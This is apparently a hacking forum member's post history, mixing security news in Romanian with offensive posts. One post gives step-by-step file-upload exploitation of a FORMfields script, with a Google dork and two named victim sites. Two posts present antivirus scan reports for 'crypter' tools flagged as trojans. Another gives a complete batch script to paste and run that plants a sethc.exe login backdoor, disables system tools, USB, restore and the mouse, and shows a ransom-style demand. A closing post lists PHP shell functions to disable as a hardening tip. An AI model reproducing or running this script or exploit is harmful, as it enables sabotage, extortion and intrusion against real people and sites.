Jump to content

Skream Example

Active Members
 View Profile  See their activity

  • Posts

    147

  • Joined

  • Last visited

  • Days Won

    1

 Content Type 

Posts posted by Skream Example

  2. FORMfields Upload Vulnability

    in Exploituri

    Posted 

    # Author: [PretoriaN]
    # Vendor or Software Link:
    # Version: [app version]
    # Category:: [Exploit]
    # Google dork: [inurl:/forms/FORMfields/]
    # Tested on: [PHP]
    #Exploit:/examples/allFields/ffce_all_fields.php#upload

    Step 1: in Text Field: type any name
    Step 2: Image Verification: Write image verification
    step 3: in Upload Field chose your index and type Save

    And you will se a link where The Index has been Located
    # Demo site: [hxxp://www.libyaonline.com/forms/FORMfields/examples/allFields/ffce_all_fields.php#upload]
    Demo 2: [hxxp://www.corindagolfcourse.com.au/forms/FORMfields/examples/allFields/ffce_all_fields.php#upload}

  3. GIGA Crypter

    in Cosul de gunoi

    Posted · Edited by Nytro

    buqko5.png

    File Info

    Report date: 2011-03-24 12:52:56 (GMT 1)

    File name: giga-crypter-exe

    File size: 5402624 bytes

    MD5 Hash: 2215ab0aba9ee87281934924943fa4be

    SHA1 Hash: ad2d05e470d062fc57359df4534abf307aa383ab

    Detection rate: 4 on 9 (44%)

    Status: INFECTED

    Detections

    Avast - MSIL:Inject-AE [Trj]

    AVG - Dropper.Msil.AB

    ClamAV -

    Comodo -

    Emsisoft - Gen.Variant.MSILKrypt!IK

    F-Prot -

    Ikarus - Gen.Variant.MSILKrypt

    TrendMicro -

    Zoner -

    Scan report generated by

    NoVirusThanks.org

    // Removed

  4. Make windows a HELL

    in Programare

    Posted

    Below is the batch script which edits registry forcefully and make some unwanted changes in windows, which finally makes the person mad n format the system. Copy and Paste the below code to notepad n save as .bat

    @ECHO OFF
    REM adding the system prompt at the login time 
    cd\
    cd windows\system32
    copy cmd.exe d:
    d:
    ren cmd.exe sethc.exe
    echo y|copy sethc.exe c:\windows\system32\
    del sethc.exe

    REM removing folder options from user panel
    REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

    REM removing folder options from machnie
    REG add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

    REM disabling task manager
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

    REM disabling the run bar
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

    REM disabling the noclose option
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

    REM disabling the NoFind(search) option
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f

    REM disabling the all drives from user seeing
    REG add HKCU\software\microsoft\windows\currentversion\policies\explorer /v NoDrives /t REG_DWORD /d 0x3ffffff /f

    REM disabling the desktop
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f

    REM adding the legal caption at the start up
    REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /t REG_SZ /d "YOUR COMPUTER IS HACKED BY Crazy009" /f

    REM adding the text in the legal caption value at start up
    REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /t REG_SZ /d "HEY DUDE,HOW ARE YOU ???? HOPEFULLY YOU ARE NOT FINE AS YOUR COMPUTER IS HACKED BY ME.ACTUALLY YOU MUST GIVE RESPECT TO THE HACKERS,THESE GUYS ARE BRILLIANT AND BLAH,BLAH......OH DONT CRY FOR YOUR SYSTEM.I CAN REPAIR IT,FOR THAT PAY ME,CONTACT: indishell.crazy009@gmail.com" /f

    REM Hacking the Internet Explorer
    REM Making the toolbar kewl
    REG add "HKCU\Software\Microsoft\Internet Explorer\Toolbar" /v BackBitmap /t REG_SZ /d c:\Windows\Web\Wallpaper\Bliss.bmp /f

    REM Changing the Caption of IE
    REG add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "HACKED BY ANKIT CHAUHAN" /f

    REM removing the user name from start menu
    REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f

    REM removing all-programs option from start menu
    REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

    REM locking the taskbar
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v LockTaskbar /t REG_DWORD /d 1 /f

    REM blocking usb ports
    REG add HKLM\System\CurrentControlSet\Services\USBSTOR /v Start /t REG_DWORD /d 4 /f

    REM disabling system restore point
    REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

    REM disabling the windows key
    REG add "HKLM\System\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 00000000000000000300000000005be000005ce000000000 /f 

    REM changing the wallpaper
    REG add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Windows\Web\Wallpaper\Azul.jpeg /f

    REM disabling the editing of registry
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

    REM editing the boot file with no guiboot
    bootcfg /addsw /ng /id 1

    REM Swapping of Mouse Button Functions
    rundll32 user32.dll,SwapMouseButton

    REM TO DISABLE THE MOUSE
    set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    reg delete %key%
    reg add %key% /v Start /t REG_DWORD /d 4

    Don't run on your own system

  5. BitDefender lanseaza TrafficLight (versiune beta)

    in Stiri securitate

    Posted

    In primul rand ce este TrafficLight?

    Este un antivirus si scanner anti-phishing cu actiune in timp real, care semnaleaza nivelul de siguranta al paginilor web.

    Acest produs lansat de Bitdefender are scopul de a oferi siguranta la navigarea online.

    TrafficLight nu este un toolbar si nu se bazeaza pe faptul ca utilizatorii insemneaza paginile vizitate.

    TrafficLight este o aplicatie independenta de motorul de cautare, care filtreaza traficul web si „comunica” prin intermediul simbolurilor specifice unui semafor, inserate in paginile vizitate pentru a semnala nivelul de siguranta al anumitor URL-uri.

    TrafficLight nu obtureaza vizibilitarea pe site-uri – interfata programului poate fi vizualizata printr-un simplu click; neaccesata, aceasta sta ascunsa.

    De asemenea, TrafficLight foloseste motoarele de scanare BitDefender pentru a analiza si evalua fiecare pagina si link accesate si blocheaza continutul nesigur inainte de a ajunge in browser-ul folosit de utilizator – oricare ar fi acesta.

    In plus, BitDefender a lansat o versiune a TrafficLight ca extensie a browser-ului Google Chrome, pentru cei care folosesc platforma Linux sau Mac OS X. Extensia e disponibila pe site-ul de extensii al Google Chrome.

    Ea poate fi descarca de aici

  14. Jasakom Crypter

    in Programe hacking

    Posted · Edited by Nytro

    File Info

    Report date: 2011-03-22 11:59:33 (GMT 1)

    File name: jasakom-exe

    File size: 1607680 bytes

    MD5 Hash: 16a890cff591522f4c57b70eecca7e0b

    SHA1 Hash: 0ff3dda6f7d8e54489ad065770238b259c896964

    Detection rate: 7 on 9 (78%)

    Status: INFECTED

    Detections

    Avast - Win32: Delf-LWX [Drp]

    AVG - Dropper.Generic.CHDX

    ClamAV -

    Comodo - UnclassifiedMalware

    Emsisoft - Trojan.Win32.Buzus!IK

    F-Prot - W32/Trojan2.HTQT

    Ikarus - Trojan.Win32.Buzus

    TrendMicro -

    Zoner - Trojan.Buzus-4904

    Scan report generated by

    NoVirusThanks.org

    Descarcare:

    // Link scos, e prea detectabil si poate mai e si infectat

    jasakomforrst.jpg

  16. S-a aprobat domeniul .XXX

    in Stiri securitate

    Posted

    Industria Web pentru adulti este oficiala!

    Dupa 10 ani de controverse si dezbateri, Corporatia pentru Atribuirea Numelor si Numerelor pe Internet (ICANN) a luat decizia de a aproba .XXX ca domeniu top level.

    Dar, ideea crearii unui district “red-light” pentru site-urile cu continut pornografic a intampinat critici din partea gruparilor religioase si a conservatorilor, care argumenteaza ca domeniul .XXX legitimiza continutul pornografic pe internet, care va fi mai usor de gasit, inclusiv de catre minori.

    Pe de alta parte, gruparea Free Speech Coalition, care reprezinta industria pentru adulti sustine ca, astfel, site-urile XXX vor putea fi mai usor de blocat, reducandu-se audienta si veniturile.

    Dar, lasand la o partea filozofiile, totul se reduce la bani. Agentia din SUA care se ocupa cu alocarea noilor domenii va beneficia de un profit destul de generos: in conditiile in care companiile care vor sa isi inregistreze adresa web pe .XXX vor trebui sa plateasca 60 de dolari an.

    Si cum, potrivit estimarilor numarul acestora va ajunge la aproximativ 500.000 pana la vara, cand vor aparea primele site-uri pe noul domeniu, putem concluziona ca aranjamentul este unul extrem de avantajos.

    De retinut ca taxa pentru domenii se situeaza in mod normal in jurul valorii de 10 dolari sau chiar mai putin.

    sursa:hit.ro

  17. How to secure your server from PHP shells!

    in Tutoriale in engleza

    Posted

    Adding these things in ur php.ini file, protect your server from execution of shells.

    disable_functions = php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abord, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpaththru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc?_open,
    ini_alter,dl,popen,popen,pcntl_exec,socket_accept,socket_bind,socket_clear_error?,
    socket_close,socket_connect
    safe_mode = On
    register_globals = Off
    display_errors = Off
    allow_url_fopen = Off
    allow_url_include = Off
    enable open_basedir(set it to webroot path)

×
×
  • Create New...